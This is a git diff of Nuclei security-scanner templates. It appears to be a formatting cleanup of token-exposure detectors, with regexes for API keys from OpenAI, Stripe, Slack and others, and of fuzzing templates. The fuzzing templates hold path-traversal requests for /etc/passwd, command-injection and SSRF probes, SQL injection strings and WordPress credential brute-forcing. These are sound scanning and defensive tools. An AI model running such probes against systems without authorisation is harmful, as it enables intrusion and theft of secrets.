@@ -9,8 +9,8 @@ info: - https://platform.openai.com/docs/api-reference - https://platform.openai.com/docs/api-reference/authentication metadata: - max-request: 1 verified: true + max-request: 1 tags: openai,token,exposure http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - "(sk-[a-zA-Z0-9]{48})" \ No newline at end of file + - "(sk-[a-zA-Z0-9]{48})" diff --git a/http/exposures/tokens/paypal/braintree-access-token.yaml b/http/exposures/tokens/paypal/braintree-access-token.yaml index 1aff95cf4d..77b44f1a29 100755 --- a/http/exposures/tokens/paypal/braintree-access-token.yaml +++ b/http/exposures/tokens/paypal/braintree-access-token.yaml @@ -4,14 +4,15 @@ info: name: PayPal Braintree Access Token Disclosure author: Ice3man severity: info - tags: exposure,token,paypal metadata: max-request: 1 + tags: exposure,token,paypal http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body diff --git a/http/exposures/tokens/picatic/picatic-api-key.yaml b/http/exposures/tokens/picatic/picatic-api-key.yaml index bad3c9175d..79793f70f9 100755 --- a/http/exposures/tokens/picatic/picatic-api-key.yaml +++ b/http/exposures/tokens/picatic/picatic-api-key.yaml @@ -4,16 +4,17 @@ info: name: Picatic API Key Disclosure author: Ice3man severity: info - tags: exposure,token metadata: max-request: 1 + tags: exposure,token http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body regex: - - 'sk_live_[0-9a-z]{32}' \ No newline at end of file + - 'sk_live_[0-9a-z]{32}' diff --git a/http/exposures/tokens/postman/postman-key.yaml b/http/exposures/tokens/postman/postman-key.yaml index 18bb29a324..c2e6afc21f 100644 --- a/http/exposures/tokens/postman/postman-key.yaml +++ b/http/exposures/tokens/postman/postman-key.yaml @@ -8,8 +8,8 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/postman.yml - https://learning.postman.com/docs/developer/intro-api/ metadata: - max-request: 1 verified: true + max-request: 1 tags: postman,keys,token,api,exposure http: diff --git a/http/exposures/tokens/pypi/pypi-upload-token.yaml b/http/exposures/tokens/pypi/pypi-upload-token.yaml index 24a28ce77e..c36436ac4b 100644 --- a/http/exposures/tokens/pypi/pypi-upload-token.yaml +++ b/http/exposures/tokens/pypi/pypi-upload-token.yaml @@ -9,8 +9,8 @@ info: - https://github.com/pypa/warehouse/issues/6051 - https://pypi.org/project/pypitoken/ metadata: - max-request: 1 verified: true + max-request: 1 tags: pypi,token,exposure http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - "(pypi-AgEIcHlwaS5vcmc[a-zA-Z0-9_-]{50,})" \ No newline at end of file + - "(pypi-AgEIcHlwaS5vcmc[a-zA-Z0-9_-]{50,})" diff --git a/http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml b/http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml index 6106e0a5eb..410639f959 100644 --- a/http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml +++ b/http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/streaak/keyhacks#Razorpay-keys - https://docs.gitguardian.com/secrets-detection/detectors/specifics/razorpay_apikey - tags: exposure,token,razorpay metadata: max-request: 1 + tags: exposure,token,razorpay http: - method: GET diff --git a/http/exposures/tokens/ruby/rubygems-api-key.yaml b/http/exposures/tokens/ruby/rubygems-api-key.yaml index a119fb2e9b..62e7ca4bc1 100644 --- a/http/exposures/tokens/ruby/rubygems-api-key.yaml +++ b/http/exposures/tokens/ruby/rubygems-api-key.yaml @@ -9,8 +9,8 @@ info: - https://guides.rubygems.org/rubygems-org-api/ - https://guides.rubygems.org/api-key-scopes/ metadata: - max-request: 1 verified: true + max-request: 1 tags: rubygems,token,exposure,ruby http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - "(rubygems_[a-f0-9]{48})" \ No newline at end of file + - "(rubygems_[a-f0-9]{48})" diff --git a/http/exposures/tokens/sauce/sauce-token.yaml b/http/exposures/tokens/sauce/sauce-token.yaml index fc536fb8d8..87cbbe816e 100644 --- a/http/exposures/tokens/sauce/sauce-token.yaml +++ b/http/exposures/tokens/sauce/sauce-token.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/sauce.yml metadata: - max-request: 1 verified: true + max-request: 1 tags: sauce,token,exposure http: @@ -20,4 +20,4 @@ http: - type: regex part: body regex: - - '(?i)sauce.{0,50}\b([a-f0-9-]{36})\b' \ No newline at end of file + - '(?i)sauce.{0,50}\b([a-f0-9-]{36})\b' diff --git a/http/exposures/tokens/segment/segment-public-token.yaml b/http/exposures/tokens/segment/segment-public-token.yaml index cf9451aa05..1cea45fe66 100644 --- a/http/exposures/tokens/segment/segment-public-token.yaml +++ b/http/exposures/tokens/segment/segment-public-token.yaml @@ -9,8 +9,8 @@ info: - https://segment.com/docs/api/public-api/ - https://segment.com/blog/how-segment-proactively-protects-customer-api-tokens/ metadata: - max-request: 1 verified: true + max-request: 1 tags: segment,token,exposure http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - '(sgp_[a-zA-Z0-9]{64})' \ No newline at end of file + - '(sgp_[a-zA-Z0-9]{64})' diff --git a/http/exposures/tokens/sendgrid/sendgrid-api-key.yaml b/http/exposures/tokens/sendgrid/sendgrid-api-key.yaml index 252cb3a0e9..c5125c3481 100644 --- a/http/exposures/tokens/sendgrid/sendgrid-api-key.yaml +++ b/http/exposures/tokens/sendgrid/sendgrid-api-key.yaml @@ -4,14 +4,15 @@ info: name: Sendgrid API Key Disclosure author: Ice3man severity: info - tags: exposure,token,sendgrid metadata: max-request: 1 + tags: exposure,token,sendgrid http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body diff --git a/http/exposures/tokens/shopify/shopify-app-secret.yaml b/http/exposures/tokens/shopify/shopify-app-secret.yaml index bca109e24a..b75d2b823b 100644 --- a/http/exposures/tokens/shopify/shopify-app-secret.yaml +++ b/http/exposures/tokens/shopify/shopify-app-secret.yaml @@ -9,8 +9,8 @@ info: - https://shopify.dev/apps/auth - https://shopify.dev/changelog/app-secret-key-length-has-increased metadata: - max-request: 1 verified: true + max-request: 1 tags: shopify,token,exposure http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - '\b(shpss_[a-fA-F0-9]{32})\b' \ No newline at end of file + - '\b(shpss_[a-fA-F0-9]{32})\b' diff --git a/http/exposures/tokens/shopify/shopify-customapp-token.yaml b/http/exposures/tokens/shopify/shopify-customapp-token.yaml index 4c5a774e94..614e0df518 100644 --- a/http/exposures/tokens/shopify/shopify-customapp-token.yaml +++ b/http/exposures/tokens/shopify/shopify-customapp-token.yaml @@ -9,8 +9,8 @@ info: - https://shopify.dev/apps/auth - https://shopify.dev/changelog/app-secret-key-length-has-increased metadata: - max-request: 1 verified: true + max-request: 1 tags: shopify,token,exposure http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - '\b(shpca_[a-fA-F0-9]{32})\b' \ No newline at end of file + - '\b(shpca_[a-fA-F0-9]{32})\b' diff --git a/http/exposures/tokens/shopify/shopify-legacy-token.yaml b/http/exposures/tokens/shopify/shopify-legacy-token.yaml index 730cd5408c..0c385395de 100644 --- a/http/exposures/tokens/shopify/shopify-legacy-token.yaml +++ b/http/exposures/tokens/shopify/shopify-legacy-token.yaml @@ -9,8 +9,8 @@ info: - https://shopify.dev/apps/auth - https://shopify.dev/changelog/app-secret-key-length-has-increased metadata: - max-request: 1 verified: true + max-request: 1 tags: shopify,token,exposure http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - '\b(shppa_[a-fA-F0-9]{32})\b' \ No newline at end of file + - '\b(shppa_[a-fA-F0-9]{32})\b' diff --git a/http/exposures/tokens/shopify/shopify-public-token.yaml b/http/exposures/tokens/shopify/shopify-public-token.yaml index 9cb37c6357..aae622a0d5 100644 --- a/http/exposures/tokens/shopify/shopify-public-token.yaml +++ b/http/exposures/tokens/shopify/shopify-public-token.yaml @@ -9,8 +9,8 @@ info: - https://shopify.dev/apps/auth - https://shopify.dev/changelog/app-secret-key-length-has-increased metadata: - max-request: 1 verified: true + max-request: 1 tags: shopify,token,exposure http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - '\b(shpat_[a-fA-F0-9]{32})\b' \ No newline at end of file + - '\b(shpat_[a-fA-F0-9]{32})\b' diff --git a/http/exposures/tokens/slack/slack-bot-token.yaml b/http/exposures/tokens/slack/slack-bot-token.yaml index 187e294cc0..9b31fbd9ad 100644 --- a/http/exposures/tokens/slack/slack-bot-token.yaml +++ b/http/exposures/tokens/slack/slack-bot-token.yaml @@ -4,9 +4,9 @@ info: name: Slack access token author: nadino severity: info - tags: exposure,token,slack metadata: max-request: 1 + tags: exposure,token,slack http: - method: GET @@ -17,4 +17,4 @@ http: - type: regex part: body regex: - - "xoxb-[0-9A-Za-z\\-]{51}" \ No newline at end of file + - "xoxb-[0-9A-Za-z\\-]{51}" diff --git a/http/exposures/tokens/slack/slack-user-token.yaml b/http/exposures/tokens/slack/slack-user-token.yaml index 30f7b25e60..5ab55314cf 100644 --- a/http/exposures/tokens/slack/slack-user-token.yaml +++ b/http/exposures/tokens/slack/slack-user-token.yaml @@ -4,9 +4,9 @@ info: name: Slack User token disclosure author: Ice3man severity: info - tags: exposure,token,slack metadata: max-request: 1 + tags: exposure,token,slack http: - method: GET @@ -17,4 +17,4 @@ http: - type: regex part: body regex: - - "xoxp-[0-9A-Za-z\\-]{72}" \ No newline at end of file + - "xoxp-[0-9A-Za-z\\-]{72}" diff --git a/http/exposures/tokens/slack/slack-webhook-token.yaml b/http/exposures/tokens/slack/slack-webhook-token.yaml index 9d64f9ca90..455e10616e 100755 --- a/http/exposures/tokens/slack/slack-webhook-token.yaml +++ b/http/exposures/tokens/slack/slack-webhook-token.yaml @@ -4,9 +4,9 @@ info: name: Slack Webhook Disclosure author: Ice3man severity: info - tags: exposure,token,slack metadata: max-request: 1 + tags: exposure,token,slack http: - method: GET @@ -17,4 +17,4 @@ http: - type: regex part: body regex: - - "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}" \ No newline at end of file + - "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}" diff --git a/http/exposures/tokens/sonarqube/sonarqube-token.yaml b/http/exposures/tokens/sonarqube/sonarqube-token.yaml index adb51d9ce1..1cec44ba3d 100755 --- a/http/exposures/tokens/sonarqube/sonarqube-token.yaml +++ b/http/exposures/tokens/sonarqube/sonarqube-token.yaml @@ -4,14 +4,15 @@ info: name: SonarQube Token Disclosure author: Ice3man severity: info - tags: exposure,token,sonarqube metadata: max-request: 1 + tags: exposure,token,sonarqube http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body diff --git a/http/exposures/tokens/square/square-access.yaml b/http/exposures/tokens/square/square-access.yaml index d939d9dd92..281c9686b2 100644 --- a/http/exposures/tokens/square/square-access.yaml +++ b/http/exposures/tokens/square/square-access.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/square.yml metadata: - max-request: 1 verified: true + max-request: 1 tags: square,token,exposure http: @@ -20,4 +20,4 @@ http: - type: regex part: body regex: - - '(?i)\b(sq0atp-[a-z0-9_-]{22})\b' \ No newline at end of file + - '(?i)\b(sq0atp-[a-z0-9_-]{22})\b' diff --git a/http/exposures/tokens/square/square-oauth-secret-token.yaml b/http/exposures/tokens/square/square-oauth-secret-token.yaml index 7d8fd0029a..73b7c70c24 100644 --- a/http/exposures/tokens/square/square-oauth-secret-token.yaml +++ b/http/exposures/tokens/square/square-oauth-secret-token.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/square.yml metadata: - max-request: 1 verified: true + max-request: 1 tags: square,token,exposure,oauth http: @@ -20,4 +20,4 @@ http: - type: regex part: body regex: - - '(?i)\b(sq0csp-[a-z0-9_-]{43})\b' \ No newline at end of file + - '(?i)\b(sq0csp-[a-z0-9_-]{43})\b' diff --git a/http/exposures/tokens/stackhawk/stackhawk-api.yaml b/http/exposures/tokens/stackhawk/stackhawk-api.yaml index 53d6076ae5..903d419af0 100644 --- a/http/exposures/tokens/stackhawk/stackhawk-api.yaml +++ b/http/exposures/tokens/stackhawk/stackhawk-api.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/stackhawk.yml metadata: - max-request: 1 verified: true + max-request: 1 tags: stackhawk,token,exposure http: @@ -20,4 +20,4 @@ http: - type: regex part: body regex: - - '\b(hawk\.[0-9A-Za-z_-]{20}\.[0-9A-Za-z_-]{20})\b' \ No newline at end of file + - '\b(hawk\.[0-9A-Za-z_-]{20}\.[0-9A-Za-z_-]{20})\b' diff --git a/http/exposures/tokens/stripe/stripe-restricted-key.yaml b/http/exposures/tokens/stripe/stripe-restricted-key.yaml index bab2e07f63..a8cc6d53aa 100755 --- a/http/exposures/tokens/stripe/stripe-restricted-key.yaml +++ b/http/exposures/tokens/stripe/stripe-restricted-key.yaml @@ -4,14 +4,15 @@ info: name: Stripe Restricted Key Disclosure author: Ice3man severity: info - tags: exposure,token,stripe metadata: max-request: 1 + tags: exposure,token,stripe http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body diff --git a/http/exposures/tokens/stripe/stripe-secret-key.yaml b/http/exposures/tokens/stripe/stripe-secret-key.yaml index 9cf3a209b9..f6ec0aaeff 100755 --- a/http/exposures/tokens/stripe/stripe-secret-key.yaml +++ b/http/exposures/tokens/stripe/stripe-secret-key.yaml @@ -4,14 +4,15 @@ info: name: Stripe Secret Key Disclosure author: Ice3man severity: info - tags: exposure,token,stripe metadata: max-request: 1 + tags: exposure,token,stripe http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body diff --git a/http/exposures/tokens/telegram/telegram-bot-token.yaml b/http/exposures/tokens/telegram/telegram-bot-token.yaml index 84200dd449..9868b514f1 100644 --- a/http/exposures/tokens/telegram/telegram-bot-token.yaml +++ b/http/exposures/tokens/telegram/telegram-bot-token.yaml @@ -9,8 +9,8 @@ info: - https://core.telegram.org/bots/api - https://core.telegram.org/bots/features#botfather metadata: - max-request: 1 verified: true + max-request: 1 tags: telegram,token,exposure http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - '\b(\d+:AA[a-zA-Z0-9_-]{32,33})' \ No newline at end of file + - '\b(\d+:AA[a-zA-Z0-9_-]{32,33})' diff --git a/http/exposures/tokens/twilio/twilio-api-key.yaml b/http/exposures/tokens/twilio/twilio-api-key.yaml index c266684e0a..f3ccd25d5d 100644 --- a/http/exposures/tokens/twilio/twilio-api-key.yaml +++ b/http/exposures/tokens/twilio/twilio-api-key.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/twilio.yml metadata: - max-request: 1 verified: true + max-request: 1 tags: twilio,token,exposure http: diff --git a/http/exposures/tokens/zendesk/zendesk-key.yaml b/http/exposures/tokens/zendesk/zendesk-key.yaml index acb6b020bf..efd440c55f 100644 --- a/http/exposures/tokens/zendesk/zendesk-key.yaml +++ b/http/exposures/tokens/zendesk/zendesk-key.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.go metadata: - max-request: 1 verified: true + max-request: 1 tags: zendesk,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:zendesk)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:zendesk)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/zenserp/zenscrape-api-key.yaml b/http/exposures/tokens/zenserp/zenscrape-api-key.yaml index 743290c667..bf3c36c12d 100644 --- a/http/exposures/tokens/zenserp/zenscrape-api-key.yaml +++ b/http/exposures/tokens/zenserp/zenscrape-api-key.yaml @@ -1,13 +1,14 @@ id: zenscrape-api-key + info: name: Zenscrape API Key author: ritikchaddha severity: info reference: - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zenscrape/zenscrape.go - tags: exposure,token,zenscrape,apikey metadata: max-request: 1 + tags: exposure,token,zenscrape,apikey http: - method: GET diff --git a/http/exposures/tokens/zenserp/zenserp-api-key.yaml b/http/exposures/tokens/zenserp/zenserp-api-key.yaml index ffbe6b257e..222adc2eb8 100644 --- a/http/exposures/tokens/zenserp/zenserp-api-key.yaml +++ b/http/exposures/tokens/zenserp/zenserp-api-key.yaml @@ -1,13 +1,14 @@ id: zenserp-api-key + info: name: Zenserp Api Key author: ritikchaddha severity: info reference: - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zenserp/zenserp.go - tags: exposure,token,zenserp,apikey metadata: max-request: 1 + tags: exposure,token,zenserp,apikey http: - method: GET diff --git a/http/exposures/tokens/zoho/zoho-webhook-token.yaml b/http/exposures/tokens/zoho/zoho-webhook-token.yaml index ac57d6ebad..3708f27512 100755 --- a/http/exposures/tokens/zoho/zoho-webhook-token.yaml +++ b/http/exposures/tokens/zoho/zoho-webhook-token.yaml @@ -4,14 +4,15 @@ info: name: Zoho Webhook Disclosure author: Ice3man severity: info - tags: exposure,token,zoho metadata: max-request: 1 + tags: exposure,token,zoho http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body diff --git a/http/fuzzing/cache-poisoning-fuzz.yaml b/http/fuzzing/cache-poisoning-fuzz.yaml index 60a17adb64..b067f447af 100644 --- a/http/fuzzing/cache-poisoning-fuzz.yaml +++ b/http/fuzzing/cache-poisoning-fuzz.yaml @@ -7,9 +7,9 @@ info: reference: - https://youst.in/posts/cache-poisoning-at-scale/ - https://portswigger.net/web-security/web-cache-poisoning - tags: fuzz,cache metadata: max-request: 5834 + tags: fuzz,cache http: - raw: @@ -18,7 +18,6 @@ http: Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 {{headers}}: {{randstr}}.tld - - | GET /?{{md5(headers)}}=1 HTTP/1.1 Host: {{Hostname}} @@ -26,8 +25,8 @@ http: attack: clusterbomb payloads: - headers: helpers/wordlists/headers.txt + headers: helpers/wordlists/headers.txt stop-at-first-match: true matchers: - type: dsl diff --git a/http/fuzzing/header-command-injection.yaml b/http/fuzzing/header-command-injection.yaml index 2787cf1eba..2e622de1de 100644 --- a/http/fuzzing/header-command-injection.yaml +++ b/http/fuzzing/header-command-injection.yaml @@ -7,11 +7,11 @@ info: description: Headers were tested for remote command injection vulnerabilities. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: fuzz,rce metadata: max-request: 7650 + tags: fuzz,rce http: - raw: @@ -24,9 +24,9 @@ http: header: helpers/payloads/request-headers.txt payload: helpers/payloads/command-injection.txt attack: clusterbomb - host-redirects: true stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/iis-shortname.yaml index 72b249e7da..5c283dc06e 100644 --- a/http/fuzzing/iis-shortname.yaml +++ b/http/fuzzing/iis-shortname.yaml @@ -11,11 +11,11 @@ info: - http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: fuzz,edb metadata: max-request: 4 + tags: fuzz,edb http: - raw: @@ -24,19 +24,16 @@ http: Host: {{Hostname}} Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - - | GET /*~1*/a.aspx' HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - - | OPTIONS /N0t4xist*~1*/a.aspx HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - - | OPTIONS /*~1*/a.aspx' HTTP/1.1 Host: {{Hostname}} diff --git a/http/fuzzing/linux-lfi-fuzzing.yaml b/http/fuzzing/linux-lfi-fuzzing.yaml index 5cb3ab42f6..5cd9434f54 100644 --- a/http/fuzzing/linux-lfi-fuzzing.yaml +++ b/http/fuzzing/linux-lfi-fuzzing.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: linux,lfi,fuzz metadata: max-request: 22 + tags: linux,lfi,fuzz http: - method: GET @@ -38,6 +38,7 @@ http: - "{{BaseURL}}/file?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/file?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/?q=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + stop-at-first-match: true matchers: - type: regex diff --git a/http/fuzzing/mdb-database-file.yaml b/http/fuzzing/mdb-database-file.yaml index ea3c12c4d3..2be0504c3d 100644 --- a/http/fuzzing/mdb-database-file.yaml +++ b/http/fuzzing/mdb-database-file.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: fuzz,mdb,asp metadata: max-request: 341 + tags: fuzz,mdb,asp http: - raw: @@ -25,15 +25,15 @@ http: payloads: mdbPaths: helpers/wordlists/mdb-paths.txt - threads: 50 - max-size: 500 # Size in bytes - Max Size to read from server response + max-size: 500 # Size in bytes - Max Size to read from server response stop-at-first-match: true + matchers-condition: and matchers: - type: binary binary: - - "000100005374616E64617264204A657420444200" # mdb + - "000100005374616E64617264204A657420444200" # mdb part: body - type: word diff --git a/http/fuzzing/prestashop-module-fuzz.yaml b/http/fuzzing/prestashop-module-fuzz.yaml index 0c52baefb1..27118a52ed 100644 --- a/http/fuzzing/prestashop-module-fuzz.yaml +++ b/http/fuzzing/prestashop-module-fuzz.yaml @@ -4,9 +4,9 @@ info: name: Prestashop Modules Enumeration author: meme-lord severity: info - tags: fuzz,prestashop metadata: max-request: 639 + tags: fuzz,prestashop http: - raw: @@ -21,6 +21,7 @@ http: path: helpers/wordlists/prestashop-modules.txt threads: 50 + matchers-condition: and matchers: - type: word diff --git a/http/fuzzing/ssrf-via-proxy.yaml b/http/fuzzing/ssrf-via-proxy.yaml index 9dd4b57965..ec72a18510 100644 --- a/http/fuzzing/ssrf-via-proxy.yaml +++ b/http/fuzzing/ssrf-via-proxy.yaml @@ -24,7 +24,6 @@ http: - OPTIONS - TRACE - PATCH - raw: - |+ {{verb}} http://127.0.0.1:22 HTTP/1.1 @@ -32,6 +31,7 @@ http: stop-at-first-match: true unsafe: true + matchers-condition: and matchers: - type: word diff --git a/http/fuzzing/valid-gmail-check.yaml b/http/fuzzing/valid-gmail-check.yaml index 3a938ca105..90105add2d 100644 --- a/http/fuzzing/valid-gmail-check.yaml +++ b/http/fuzzing/valid-gmail-check.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://github.com/dievus/geeMailUserFinder - tags: fuzz,gmail metadata: max-request: 1 + tags: fuzz,gmail self-contained: true + http: - method: HEAD path: diff --git a/http/fuzzing/waf-fuzz.yaml b/http/fuzzing/waf-fuzz.yaml index 8c078c67ec..62b60d8e57 100644 --- a/http/fuzzing/waf-fuzz.yaml +++ b/http/fuzzing/waf-fuzz.yaml @@ -21,7 +21,6 @@ http: Content-Type: application/x-www-form-urlencoded _={{whatwaf-payloads}} - - | GET /?_={{whatwaf-payloads}} HTTP/1.1 Host: {{Hostname}} @@ -57,7 +56,6 @@ http: - SELECT * FROM information_schema.tables - SELECT user FROM information_schema.tables AND user = \'test user\'; - UNION SELECT * FROM users WHERE user = \'admin\'; - stop-at-first-match: true matchers: - type: regex diff --git a/http/fuzzing/wordpress-plugins-detect.yaml b/http/fuzzing/wordpress-plugins-detect.yaml index e2054c6aed..2652215542 100644 --- a/http/fuzzing/wordpress-plugins-detect.yaml +++ b/http/fuzzing/wordpress-plugins-detect.yaml @@ -4,9 +4,9 @@ info: name: WordPress Plugins Detection author: 0xcrypto severity: info - tags: fuzz,wordpress metadata: max-request: 98135 + tags: fuzz,wordpress http: - raw: @@ -34,4 +34,4 @@ http: group: 1 regex: - "===\\s(.*)\\s===" # extract the plugin name - - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version \ No newline at end of file + - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version diff --git a/http/fuzzing/wordpress-themes-detect.yaml b/http/fuzzing/wordpress-themes-detect.yaml index 8c50026c1b..f9c9355804 100644 --- a/http/fuzzing/wordpress-themes-detect.yaml +++ b/http/fuzzing/wordpress-themes-detect.yaml @@ -4,9 +4,9 @@ info: name: WordPress Theme Detection author: 0xcrypto severity: info - tags: fuzz,wordpress metadata: max-request: 24434 + tags: fuzz,wordpress http: - raw: @@ -16,8 +16,8 @@ http: payloads: themeSlug: helpers/wordlists/wordpress-themes.txt - threads: 50 + matchers-condition: and matchers: - type: status diff --git a/http/fuzzing/wordpress-weak-credentials.yaml b/http/fuzzing/wordpress-weak-credentials.yaml index 0e0d4b09cf..de20fce340 100644 --- a/http/fuzzing/wordpress-weak-credentials.yaml +++ b/http/fuzzing/wordpress-weak-credentials.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-1391 - tags: wordpress,default-login,fuzz metadata: max-request: 276 + tags: wordpress,default-login,fuzz http: - raw: @@ -32,11 +32,10 @@ http: passwords: helpers/wordlists/wp-passwords.txt threads: 50 attack: clusterbomb - stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: header words: diff --git a/http/fuzzing/xff-403-bypass.yaml b/http/fuzzing/xff-403-bypass.yaml index 1740cc8183..d854ba9a62 100644 --- a/http/fuzzing/xff-403-bypass.yaml +++ b/http/fuzzing/xff-403-bypass.yaml @@ -5,9 +5,9 @@ info: author: vavkamil severity: info description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. - tags: fuzz metadata: max-request: 3 + tags: fuzz http: - raw: @@ -15,13 +15,11 @@ http: GET / HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET / HTTP/1.1 Host: {{Hostname}} Accept: */* X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 - - | GET /test.txt HTTP/1.1 Host: {{Hostname}} @@ -34,4 +32,4 @@ http: dsl: - "status_code_1 == 403 && status_code_2 != 403" - "status_code_1 == 403 && status_code_3 != 403" - condition: or \ No newline at end of file + condition: or diff --git a/http/iot/ampguard-wifi-setup.yaml b/http/iot/ampguard-wifi-setup.yaml index 5abd129ee9..83280f0191 100644 --- a/http/iot/ampguard-wifi-setup.yaml +++ b/http/iot/ampguard-wifi-setup.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"AmpGuard wifi setup" tags: ampguard,iot,setup,wifi diff --git a/http/iot/apc-ups-login.yaml b/http/iot/apc-ups-login.yaml index 66787b2dcf..8329b9403d 100644 --- a/http/iot/apc-ups-login.yaml +++ b/http/iot/apc-ups-login.yaml @@ -7,7 +7,7 @@ info: description: APC UPS panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -28,4 +28,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/automation-direct.yaml b/http/iot/automation-direct.yaml index a0da6dc04f..1d9b7fe744 100644 --- a/http/iot/automation-direct.yaml +++ b/http/iot/automation-direct.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7295 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/iot/brother-printer-detect.yaml b/http/iot/brother-printer-detect.yaml index ad56088578..cafd70110d 100644 --- a/http/iot/brother-printer-detect.yaml +++ b/http/iot/brother-printer-detect.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: low reference: 